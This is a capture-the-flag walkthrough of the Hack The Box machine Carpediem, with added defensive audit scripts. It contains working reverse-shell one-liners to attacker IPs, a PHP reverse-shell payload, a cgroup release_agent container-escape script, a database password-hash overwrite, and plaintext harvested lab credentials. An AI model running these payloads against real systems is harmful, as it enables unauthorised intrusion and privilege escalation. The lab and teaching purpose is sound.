Basic information
Port scan
Ports 22 and 80 are open:

```text
$ nmap -sC -sV -Pn 10.10.11.167
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-27 13:12 CST
Nmap scan report for 10.10.11.167
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 962176f72dc5f04ee0a8dfb4d95e4526 (RSA)
|   256 b16de3fada10b97b9e57535c5bb76006 (ECDSA)
|_  256 6a1696d80529d590bf6b2a0932dc364f (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Comming Soon
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.62 seconds
```
Port 80 serves a "Coming Soon" page; add the domain it reveals to /etc/hosts:

```text
10.10.11.167 carpediem.htb
```
Subdomain scan
A routine wordlist scan of virtual hosts finds portal:

```text
gobuster vhost -u http://carpediem.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Found: portal.carpediem.htb (Status: 200) [Size: 31090]
```

Add it to /etc/hosts:

```text
10.10.11.167 carpediem.htb portal.carpediem.htb
```
portal.carpediem.htb is an online motorcycle shop.

Directory scan
A directory scan of portal finds admin:

```text
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://portal.carpediem.htb

/admin                (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/admin/]
/assets               (Status: 301) [Size: 329] [--> http://portal.carpediem.htb/assets/]
/build                (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/build/]
/classes              (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/classes/]
/dist                 (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/dist/]
/inc                  (Status: 301) [Size: 326] [--> http://portal.carpediem.htb/inc/]
/index.php            (Status: 200) [Size: 31090]
/libs                 (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/libs/]
/plugins              (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/plugins/]
/uploads              (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/uploads/]
```
portal.carpediem.htb lets anyone register and log in. The profile-update request contains a login_type parameter; changing it to 1 makes our account an administrator and gives access to the admin interface.

Webshell
On the quarterly report upload page the site says the upload feature is still under development, but the upload endpoint exists and can be called directly, which lets us upload a webshell.

Reverse shell
This gives us www-data inside a container:

```bash
bash -c 'exec bash -i &>/dev/tcp/10.10.14.19/4444 <&1'
```
Docker network scan
The network was too poor during this part, so I followed a writeup rather than reproducing it myself.

Probing the Docker network reveals other containers:

```text
Nmap scan report for 172.17.0.1
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.17.0.2
PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
443/tcp open  https

Nmap scan report for 172.17.0.3
PORT      STATE SERVICE
27017/tcp open  unknown

Nmap scan report for 172.17.0.4
PORT      STATE SERVICE
3306/tcp  open  mysql
33060/tcp open  unknown

Nmap scan report for 172.17.0.5
PORT     STATE SERVICE
8118/tcp open  unknown
```
mongosh
Forward 27017 and 8118 to the local machine:

```bash
# local
chisel server --reverse --port 8000

# target
www-data@3c371615b7aa:/dev/shm$ ./chisel client 10.10.14.19:8000 R:8118:172.17.0.5:8118 R:27017:172.17.0.3:27017 &
```

Visiting local port 8000 shows Trudesk. The account credentials are in Mongo, but the password hash is bcrypt and cannot be cracked, so generate a new hash and write it straight into the database:

```text
❯ python3 password.py
$2b$10$zX4LTPwe7bEjhvQ.lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey

mongosh mongodb://127.0.0.1:27017
test> use trudesk
trudesk> db.accounts.update({"_id" : ObjectId("623c8b20855cc5001a8ba13c")}, {$set : {"password" : "$2b$10$zX4LTPwe7bEjhvQ.lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey"}});
```

Then log in to Trudesk with the changed password; one of the tickets contains Zoiper-related information.
Zoiper
We know the domain is carpediem.htb, and the ticket tells us that 9560 is the user. The password hint tells us it is currently 2022, and that by dialing *62 we can listen to credentials. Using the data we obtained, we dial in and listen to the credentials: hflaccus : AuRj4pxq9qPk. With these we can connect via ssh.

bcrypt.py

```python
import bcrypt

password = "password"
# cost factor 10 matches the $2b$10$ prefix of the existing Trudesk hashes
salt = bcrypt.gensalt(rounds=10)
encoded = bcrypt.hashpw(password.encode(), salt)
print(encoded)
```
User flag
SSH in with the hflaccus account obtained above to get the user flag.

Backdrop
Still following the writeup rather than reproducing it: as hflaccus, tcpdump captures some HTTPS traffic; decrypting it with the matching private key yields jpardella's credentials:

```text
tcpdump -i any port 443 -w captura

file /etc/ssl/certs/backdrop.carpediem.htb.key
/etc/ssl/certs/backdrop.carpediem.htb.key: PEM RSA private key

jpardella
tGPN6AmJDZwYWdhY
```

Backdrop on 8002
These credentials log in to the Backdrop instance on port 8002:

```bash
sshpass -p AuRj4pxq9qPk ssh hflaccus@10.10.11.167 -L 8002:127.0.0.1:8002
```

Exploiting the corresponding vulnerability, we import a malicious module, browse to it to execute it, and get a shell in the Backdrop container.
Enumeration
Looking for interesting files, we find a script in /opt:

```bash
www-data@90c7f522b842:/opt$ cat heartbeat.sh
#!/bin/bash
# Run a site availability check every 10 seconds via cron
checksum=($(/usr/bin/md5sum /var/www/html/backdrop/core/scripts/backdrop.sh))
if [[ $checksum != "70a121c0202a33567101e2330c069b34" ]]; then
        exit
fi
status=$(php /var/www/html/backdrop/core/scripts/backdrop.sh --root /var/www/html/backdrop https://localhost)
grep "Welcome to backdrop.carpediem.htb!" "$status"
if [[ "$?" != 0 ]]; then
        #something went wrong. restoring from backup.
        cp /root/index.php /var/www/html/backdrop/index.php
fi
www-data@90c7f522b842:/opt$
```

Every so often it replaces the index.php file and invokes it, or something along those lines. So we simply replace that PHP file and wait for the cron job to execute it, which gives us root in the container:

```bash
❯ cat index.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'");?>

www-data@90c7f522b842:~/html/backdrop$ rm -f index.php
www-data@90c7f522b842:~/html/backdrop$ wget http://10.10.14.10/index.php
```
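The defensive counterpart to heartbeat.sh, as an added example that is not from the box or the writeup: a root cron job should verify ownership, write permissions and a pinned digest for every file it will execute, not just one of them. heartbeat.sh checksums backdrop.sh only, while index.php, which the PHP bootstrap also loads, is writable by www-data and is never checked. Function names and the hypothetical paths in the usage comment are mine.

```shell
#!/bin/sh
# Added example: pre-flight checks a root cron job such as heartbeat.sh should
# run before executing files under a web root. Function names are assumptions.

# Return 0 only if $1 is a regular file owned by uid $2 (default 0) and not
# writable by group or others; otherwise a lower-privileged account can decide
# what root executes.
trusted_file() {
    local f="$1" want="${2:-0}" owner mode
    [ -f "$f" ] || return 1
    owner=$(stat -c '%u' "$f") || return 1
    mode=$(stat -c '%a' "$f") || return 1
    [ "$owner" -eq "$want" ] || return 1
    # 022 selects the group and other write bits of the octal mode
    [ $(( 0$mode & 022 )) -eq 0 ]
}

# Return 0 if the md5 of file $1 equals the pinned digest $2.
checksum_ok() {
    local actual
    actual=$(md5sum "$1" | cut -d' ' -f1) || return 1
    [ "$actual" = "$2" ]
}

# preflight PINNED_MD5 OWNER_UID ENTRY_SCRIPT [OTHER_FILE...]
# Every file the check will execute must be trusted, and the entry script must
# match its pinned digest; refuse on the first failure.
preflight() {
    local pinned="$1" uid="$2" entry="$3" f
    shift 2
    for f in "$@"; do
        trusted_file "$f" "$uid" || { echo "refusing: $f is not owned by uid $uid or is writable" >&2; return 1; }
    done
    checksum_ok "$entry" "$pinned" || { echo "refusing: $entry does not match pinned checksum" >&2; return 1; }
}

# Hypothetical invocation mirroring the box's layout (digest from heartbeat.sh):
# preflight 70a121c0202a33567101e2330c069b34 0 \
#     /var/www/html/backdrop/core/scripts/backdrop.sh \
#     /var/www/html/backdrop/index.php && run the availability check
```

With these checks in place the replaced index.php would be refused because its owner is www-data, and the cron job would not execute it as root.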
Docker escape & root flag
Then escape the container to get root on the host:

```bash
❯ cat script.sh
mkdir /dev/shm/privesc
mount -t cgroup -o rdma cgroup /dev/shm/privesc
mkdir /dev/shm/privesc/x
echo 1 > /dev/shm/privesc/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /dev/shm/privesc/release_agent
echo '#!/bin/bash' > /cmd
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'" >> /cmd
chmod a+x /cmd
bash -c "echo \$\$ > /dev/shm/privesc/x/cgroup.procs"

root@90c7f522b842:~# unshare -UrmC bash
root@90c7f522b842:~# wget http://10.10.14.10/script.sh &>/dev/null
root@90c7f522b842:~# chmod +x script.sh
root@90c7f522b842:~# ./script.sh
root@90c7f522b842:~#
```
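An audit script for the conditions the release_agent escape above depends on, as an added example that is not from the box or the writeup. It reads /proc/self/status and /proc/self/mountinfo by default; constructed copies can be passed instead. Function names are mine.

```shell
#!/bin/sh
# Added example: report container settings that make the cgroup release_agent
# escape above possible. Function names are assumptions.

CAP_SYS_ADMIN=21   # capability bit number from linux/capability.h

# Return 0 if capability bit $2 is set in the hex mask $1 (CapEff format).
has_cap() {
    [ $(( 0x$1 >> $2 & 1 )) -eq 1 ]
}

# Print the CapEff mask from /proc/<pid>/status text on stdin.
cap_eff() {
    awk '$1 == "CapEff:" { print $2 }'
}

# Print the Seccomp mode (0 none, 1 strict, 2 filter) from status text on stdin.
seccomp_mode() {
    awk '$1 == "Seccomp:" { print $2 }'
}

# Return 0 if mountinfo text on stdin contains a cgroup v1 mount. The filesystem
# type is the field after the "-" separator; release_agent exists only on v1.
has_cgroup_v1() {
    awk '{ for (i = 7; i <= NF; i++) if ($i == "-") { if ($(i+1) == "cgroup") found = 1; break } }
         END { exit !found }'
}

# Print one finding per line. The escape uses unshare -UrmC, so lacking
# CAP_SYS_ADMIN is not a fix on its own: an unfiltered unshare/mount (Seccomp: 0)
# and a visible cgroup v1 hierarchy are the conditions to remove.
audit() {
    local status="${1:-/proc/self/status}" mounts="${2:-/proc/self/mountinfo}" caps
    caps=$(cap_eff < "$status")
    if [ -n "$caps" ] && has_cap "$caps" "$CAP_SYS_ADMIN"; then
        echo "CAP_SYS_ADMIN in CapEff: process may mount cgroupfs directly"
    fi
    if [ "$(seccomp_mode < "$status")" = "0" ]; then
        echo "Seccomp: 0: no syscall filter; Docker's default profile restricts mount and unshare"
    fi
    if has_cgroup_v1 < "$mounts"; then
        echo "cgroup v1 mounted: release_agent is reachable on this hierarchy"
    fi
}

# Live usage inside a container: audit   (no output means none of the three conditions hold)
```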
root_id_rsa
(root's OpenSSH private key from the host, not reproduced here)
shadow
(/etc/shadow entries for root and hflaccus from the host, not reproduced here)
Last updated: 2022-12-05 12:37:03